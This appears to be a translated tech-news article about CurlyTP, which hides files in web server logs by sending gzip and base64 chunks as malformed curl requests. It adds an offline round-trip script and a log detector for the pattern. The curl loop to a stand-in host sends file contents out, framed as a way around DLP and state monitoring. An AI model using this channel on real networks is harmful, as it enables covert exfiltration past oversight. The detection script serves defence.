Exchanging secret messages through server logs

According to the Wikipedia definition, a dead drop is a tradecraft technique for passing information or objects between people through a secret location. The point is that the participants never meet, yet still exchange information, which preserves operational security.

A hiding place must not attract attention. That is why, in the offline world, unremarkable objects are used: a loose brick in a wall, a library book, a hollow in a tree.

The internet offers plenty of tools for encryption and anonymity, but the very fact of using them draws attention. Moreover, they may be blocked at the corporate or state level. So what do you do?

Developer Ryan Flowers proposed an interesting option: use any web server as the hiding place. Think about what a web server does. It accepts requests, serves files and writes logs. And it records every request, even malformed ones!

It turns out that any web server lets you store almost any message in its log. Flowers wondered how that could be put to use.

He proposes the following scheme:

  1. Take a text file (the secret message) and compute its hash (md5sum).
  2. Encode it (gzip + uuencode).
  3. Write it into the log by sending deliberately malformed requests to the server.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode -m g.txt.gz g.gz.uue > g.txt.uue
[root@local ~]# IFS=$'\n'; for x in $(sed 's/ /=+=/g' g.txt.uue); do curl -s "http://domain.com/?transfer?g.gz.uue?$x" > /dev/null; done

To read the file, the same operations are performed in reverse order: decode and unzip the file, then check the hash (the hash can be sent in the clear over open channels, since it only confirms that the file survived the trip intact).

Spaces are replaced with =+= so that the address contains no spaces. The tool, which the author calls CurlyTP, uses base64 encoding, the same as e-mail attachments. Each request carries the keyword ?transfer? so the recipient can easily find the lines in the logs.

What do we see in the logs in this case?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

As already mentioned, to recover the secret message the operations are performed in reverse order:

Remote machine:

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.gz.uue g.gz
[root@server /home/domain/logs]# gunzip g.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

The procedure is easy to reproduce yourself. The md5sum matches, and the file contents confirm that everything was decoded correctly.
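The whole round trip, sender and receiver, as an added example; this is not Flowers' code. It keeps the article's scheme (gzip, base64 with a begin/end header, spaces replaced by =+=, one request per encoded line under the ?transfer? keyword) but runs offline: instead of a real web server it writes the Apache-style log lines those requests would produce (constructed, not a real log), then recovers the file from that log and compares it with the original. It assumes GNU coreutils (base64, fold, md5sum), gzip, awk and sed; base64 plus fold stand in for uuencode -m, which is not installed everywhere. The function names, the client IP and the message text are made up for the example.

```bash
#!/usr/bin/env bash
# Added example of the CurlyTP idea, end to end, without a network.
# Assumes GNU coreutils (base64, fold, md5sum), gzip, awk, sed.

SEP='=+='   # the article's stand-in for a space inside the URL

# Sender side: turn a file into one request path per encoded line,
#   /?transfer?<name>?<chunk>
# The payload is gzip + base64 wrapped at 60 columns, framed by the same
# begin-base64/==== lines uuencode -m would emit, so the receiver can find
# the start and end of the message in the log.
encode_requests() {  # encode_requests <file> <name>
    local file=$1 name=$2
    {
        printf 'begin-base64 644 %s\n' "$name"
        { gzip -c "$file" | base64 | tr -d '\n'; echo; } | fold -w 60
        printf '====\n'
    } | sed "s/ /$SEP/g" | sed "s|^|/?transfer?$name?|"
}

# Stand-in for the web server: write the Apache combined-format line each
# request would leave in access_log. These lines are constructed; the
# timestamp just counts up from 21:12:00 in the order the chunks are sent.
fake_log() {  # fake_log <client-ip>; reads request paths on stdin
    local ip=$1 n=0
    while IFS= read -r path; do
        printf '%s - - [22/Aug/2019:21:%02d:%02d -0400] "GET %s HTTP/1.1" 200 4050 "-" "curl/7.29.0"\n' \
            "$ip" $((12 + n / 60)) $((n % 60)) "$path"
        n=$((n + 1))
    done
}

# Receiver side: pull the chunks for <name> back out of the log in log
# order (field 7 is the request path), undo the space substitution, keep
# only the lines between the begin/end markers, decode and decompress.
decode_from_log() {  # decode_from_log <access_log> <name> <out-file>
    local log=$1 name=$2 out=$3
    awk -v tag="?transfer?$name?" 'index($7, tag) { print $7 }' "$log" \
        | cut -d'?' -f4- \
        | sed "s/$SEP/ /g" \
        | awk '/^====$/ { f = 0 } f { print } /^begin-base64 / { f = 1 }' \
        | base64 -d | gunzip -c > "$out"
}

file_md5() { md5sum "$1" | cut -d' ' -f1; }

# Full round trip on a constructed secret; returns 0 when the recovered
# file is byte-for-byte identical to the original.
demo() {
    local dir status
    dir=$(mktemp -d)
    printf 'meet at the usual place, 21:00\n' > "$dir/g.txt"   # constructed message
    encode_requests "$dir/g.txt" g.gz.uue | fake_log 1.2.3.4 > "$dir/access_log"
    decode_from_log "$dir/access_log" g.gz.uue "$dir/g"
    echo "sent:      $(file_md5 "$dir/g.txt")"
    echo "recovered: $(file_md5 "$dir/g")"
    if cmp -s "$dir/g.txt" "$dir/g"; then status=0; else status=1; fi
    rm -rf "$dir"
    return $status
}

demo
```

The receiver selects lines by the file name inside the ?transfer? marker rather than by a time window as the article does, which is what you want once more than one message has passed through the same log. Note that nothing here encrypts the payload: gzip + base64 is encoding, and anyone who can read the log can read the message.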

A very simple method. "The purpose of this exercise is simply to prove that files can be transferred with small, innocent-looking web requests, and it works on any web server that keeps plain-text logs. Essentially, every web server is a dead drop!" writes Flowers.

Of course, the method only works if the recipient has access to the server logs. Such access is routinely granted, for example, by many hosting providers. The flip side is that everyone else with that access (the hoster, an administrator, an attacker who has compromised the machine) can read the drop just as easily, because nothing in the scheme encrypts the payload.

How can it be used?

Ryan Flowers says he is not an information security specialist and will not compile a list of possible applications for CurlyTP. For him it is a proof of concept that the ordinary tools we see every day can be used in unusual ways.

In fact, the method has several advantages over other "hiding places" such as Digital Dead Drop or PirateBox: it needs no special configuration on the server side and no special protocols, and it does not raise suspicion among those watching the traffic. The article's assumption is that a SORM or DLP system is unlikely to inspect URLs looking for compressed text files. That assumption is weaker than it looks: the payload travels in plain HTTP, so every proxy, CDN and IDS on the path sees exactly the URLs the server logs, and a burst of long base64-looking query strings from one client, all to a path that returns the same page every time, is an easy signature.
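A detection check for the other side, added here as an example; it is not part of the article or of CurlyTP. It shows what a log reviewer or a DLP rule that does look at URLs would key on: per client IP and per minute, it counts GET requests whose query string contains a run of 40 or more base64-alphabet characters and flags clients that exceed a threshold. The log lines are constructed for the demo (the first three data lines follow the article's own log excerpt, the rest are made up); the threshold, the minimum run length and the field layout (Apache combined format, request path in field 7) are assumptions.

```bash
#!/usr/bin/env bash
# Added example: flag bursts of base64-looking query strings in an Apache
# access_log. Assumes the combined log format (request path in field 7).

# Constructed sample log: one CurlyTP transfer from 1.2.3.4 (header line,
# three data chunks, terminator) and two ordinary requests from 5.6.7.8.
SAMPLE_LOG='1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:04 -0400] "GET /?transfer?g.gz.uue?QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJz HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:05 -0400] "GET /?transfer?g.gz.uue?==== HTTP/1.1" 200 4050 "-" "curl/7.29.0"
5.6.7.8 - - [22/Aug/2019:21:12:05 -0400] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
5.6.7.8 - - [22/Aug/2019:21:12:06 -0400] "GET /search?q=hello+world HTTP/1.1" 200 1234 "-" "Mozilla/5.0"'

# flag_exfil [threshold]  (default 3); reads an access_log on stdin and
# prints "ip day/Mon/year:HH:MM count" for every client/minute pair whose
# count of suspicious requests reaches the threshold.
flag_exfil() {
    awk -v min="${1:-3}" -v runlen=40 '
    {
        path = $7
        q = index(path, "?")
        if (q == 0) next                      # no query string, nothing to carry data
        query = substr(path, q + 1)

        # length of the longest run of base64 alphabet in the query
        s = query; longest = 0
        while (match(s, /[A-Za-z0-9+\/=]+/)) {
            if (RLENGTH > longest) longest = RLENGTH
            s = substr(s, RSTART + RLENGTH)
        }
        if (longest < runlen) next

        minute = substr($4, 2, 17)            # "[22/Aug/2019:21:12:01" -> "22/Aug/2019:21:12"
        n[$1 " " minute]++
    }
    END { for (k in n) if (n[k] >= min) print k, n[k] }' | sort
}

printf '%s\n' "$SAMPLE_LOG" | flag_exfil 3
```

The header and terminator lines are deliberately not counted (their longest base64 run is short), so the rule fires on the data chunks alone; a real rule would add the response size and status being identical for every request, and the fact that the path is the site root with a query it never serves.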

This is one of several ways to pass messages through service files. You may remember how some forward-thinking companies used to place job ads in HTTP headers or in the HTML source of their pages.


The idea was that only web developers would ever see such an Easter egg, since an ordinary user never looks at the headers or the HTML source.


Source: www.habr.com
